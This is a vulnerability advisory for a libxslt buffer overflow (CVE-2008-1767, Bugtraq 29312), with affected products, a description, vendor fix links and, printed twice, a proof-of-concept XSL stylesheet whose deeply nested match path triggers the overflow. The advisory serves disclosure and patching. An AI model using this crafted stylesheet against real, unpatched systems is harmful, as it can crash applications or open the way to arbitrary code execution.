libxslt XSL File Processing Buffer Overflow Vulnerability
BID:29312
Info
libxslt XSL File Processing Buffer Overflow Vulnerability
| Bugtraq ID: | 29312 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2008-1767 |
| Remote: | Yes |
| Local: | No |
| Published: | May 21 2008 12:00AM |
| Updated: | Mar 19 2015 08:32AM |
| Credit: | Anthony de Almeida Lopes |
| Vulnerable: |
XMLSoft libxslt 1.1.23 XMLSoft libxslt 1.1.17 XMLSoft libxslt 1.1.11 XMLSoft libxslt 1.0.33 XMLSoft libxslt 1.0.15 Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64 Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 lpia Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 SuSE SUSE Linux Enterprise Server 10 SP2 SuSE SUSE Linux Enterprise Server 10 SP1 SuSE SUSE Linux Enterprise Desktop 10 SP2 SuSE SUSE Linux Enterprise Desktop 10 SP1 SuSE openSUSE 10.3 Sun Solaris 10_x86 Sun Solaris 10_sparc Slackware Linux 12.1 S.u.S.E. openSUSE 10.2 S.u.S.E. Linux 10.1 x86-64 S.u.S.E. Linux 10.1 x86 S.u.S.E. Linux 10.1 ppc S.u.S.E. Linux 10.0 x86-64 S.u.S.E. Linux 10.0 x86 S.u.S.E. Linux 10.0 ppc RedHat Linux Advanced Workstation 2.1 for the Ita 2.1 IA64 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux WS 2.1 RedHat Enterprise Linux ES 4 RedHat Enterprise Linux ES 3 RedHat Enterprise Linux ES 2.1 RedHat Enterprise Linux Desktop Workstation 5 client Red Hat Fedora 9 Red Hat Fedora 8 Red Hat Fedora 7 Red Hat Enterprise Linux AS 4 Red Hat Enterprise Linux AS 3 Red Hat Enterprise Linux AS 2.1 Red Hat Enterprise Linux 5 Server Mandriva Linux Mandrake 2008.1 x86_64 Mandriva Linux Mandrake 2008.1 Mandriva Linux Mandrake 2008.0 x86_64 Mandriva Linux Mandrake 2008.0 Mandriva Linux Mandrake 2007.1 x86_64 Mandriva Linux Mandrake 2007.1 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 3.0 x86_64 MandrakeSoft Corporate Server 3.0 MandrakeSoft Corporate Server 4.0 Gentoo Linux Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia-64 Debian Linux 4.0 ia-32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0 Avaya Voice Portal 4.1 Avaya Voice Portal 4.0 Avaya Voice Portal 3.0 Avaya Proactive Contact 4.0 Avaya Proactive Contact 3.0 Avaya Messaging Storage Server MM3.0 Avaya Messaging Storage Server 3.1 Avaya Messaging Storage Server 2.0 Avaya Messaging Storage Server 1.0 Avaya Message Networking MN 3.1 Avaya Message Networking 3.1 Avaya Message Networking Avaya Intuity AUDIX LX 2.0 Avaya Aura SIP Enablement Services 3.1.1 Avaya Aura SIP Enablement Services 5.0 Apple Safari 3.1.2 Apple Safari 3.1.1 Apple Safari 3.0.3 Beta Apple Safari 3.0.2 Beta Apple Safari 3.0.1 Beta Apple Safari 3.1 Apple Safari 3 Beta Apple Safari 3 Apple Mac OS X Server 10.5.5 Apple Mac OS X Server 10.5.4 Apple Mac OS X Server 10.5.3 Apple Mac OS X Server 10.5.2 Apple Mac OS X Server 10.5.1 Apple Mac OS X Server 10.4.11 Apple Mac OS X Server 10.4.10 Apple Mac OS X Server 10.4.9 Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.4.3 Apple Mac OS X Server 10.4.2 Apple Mac OS X Server 10.4.1 Apple Mac OS X Server 10.4 Apple Mac OS X Server 10.5 Apple Mac OS X 10.5.5 Apple Mac OS X 10.5.4 Apple Mac OS X 10.5.3 Apple Mac OS X 10.5.2 Apple Mac OS X 10.5.1 Apple Mac OS X 10.4.11 Apple Mac OS X 10.4.10 Apple Mac OS X 10.4.9 Apple Mac OS X 10.4.8 Apple Mac OS X 10.4.7 Apple Mac OS X 10.4.6 Apple Mac OS X 10.4.5 Apple Mac OS X 10.4.4 Apple Mac OS X 10.4.3 Apple Mac OS X 10.4.2 Apple Mac OS X 10.4.1 Apple Mac OS X 10.4 Apple Mac OS X 10.5 Apple iPod Touch 1.1.4 Apple iPod Touch 1.1.3 Apple iPod Touch 1.1.2 Apple iPod Touch 1.1.1 Apple iPod Touch 1.1 Apple iPod Touch 0 Apple iPhone 1.1.4 Apple iPhone 1.1.3 Apple iPhone 1.1.2 Apple iPhone 1.1.1 Apple iPhone 1.0.2 Apple iPhone 1.0.1 Apple iPhone 1.1 Apple iPhone 1 Apple iPhone 0 |
| Not Vulnerable: |
Apple Safari 3.2 Apple iPod Touch 2.0 Apple iPhone 2.0 |
Discussion
libxslt XSL File Processing Buffer Overflow Vulnerability
The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects libxslt 1.1.23 and prior versions.
The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects libxslt 1.1.23 and prior versions.
Exploit / POC
libxslt XSL File Processing Buffer Overflow Vulnerability
The following proof-of-concept XSL file is available:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml"/>
<xsl:template
match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
<xsl:if test="contains(text(), 'published')">
<found/>
</xsl:if>
</xsl:template>
</xsl:stylesheet>
The following proof-of-concept XSL file is available:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml"/>
<xsl:template
match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
<xsl:if test="contains(text(), 'published')">
<found/>
</xsl:if>
</xsl:template>
</xsl:stylesheet>
Solution / Fix
libxslt XSL File Processing Buffer Overflow Vulnerability
Solution:
Vendor fixes are available. Please see the references for details.
Apple Mac OS X 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.5.5
Solution:
Vendor fixes are available. Please see the references for details.
Apple Mac OS X 10.4.11
-
Apple SecUpd2008-007Intel.dmg
(Intel)
http://www.apple.com/support/downloads/securityupdate2008007clientinte l.html -
Apple SecUpd2008-007PPC.dmg
(PPC)
http://www.apple.com/support/downloads/securityupdate2008007clientppc. html
Apple Mac OS X Server 10.4.11
-
Apple SecUpdSrvr2008-007PPC.dmg
(PPC)
http://www.apple.com/support/downloads/securityupdate2008007serverppc. html -
Apple SecUpdSrvr2008-007Univ.dmg
(Universal)
http://www.apple.com/support/downloads/securityupdate2008007serveruniv ersal.html
Apple Mac OS X Server 10.5.5
-
Apple SecUpdSrvr2008-007.dmg
http://www.apple.com/support/downloads/securityupdate2008007serverleop ard.html
References
libxslt XSL File Processing Buffer Overflow Vulnerability
References:
References:
- Bug 446809: CVE-2008-1767 libxslt: fixed-sized steps array overflow via 'templat (Red Hat)
- Bug 527297 �?? xsltproc crashes when applying a transform to an xml document (Gnome)
- CVE-2008-1767 Buffer Overflow vulnerability in libxslt (Oracle)
- libxslt Homepage (XMLSoft)
- XMLSoft Homepage (XMLSoft)
- ASA-2008-267 libxslt security update (RHSA-2008-0287) (Avaya)
- RHSA-2008:0287-2 - libxslt security update (Red Hat)